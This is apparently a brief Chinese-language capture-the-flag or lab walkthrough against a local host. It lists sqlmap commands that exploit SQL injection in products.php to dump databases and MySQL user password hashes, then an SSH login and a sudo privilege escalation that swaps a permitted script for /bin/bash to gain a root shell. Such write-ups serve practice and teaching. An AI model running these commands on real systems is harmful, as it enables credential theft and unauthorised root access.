查看ip
访问
发现可能存在sql
确实存在sql注入
端口扫描
sqlmap -u http://192.168.1.120/products.php?id=1 --dbs --batch
sqlmap -u http://192.168.1.120/products.php?id=1 -D mysql --users --passwords --batch
终端ssh连接
sudo -l
cd /home/ccoffee/scripts/
mv getlogs.sh getlogs.sh.bak
echo "/bin/bash" > getlogs.sh
chmod 777 getlogs.sh
sudo /home/ccoffee/scripts/getlogs.sh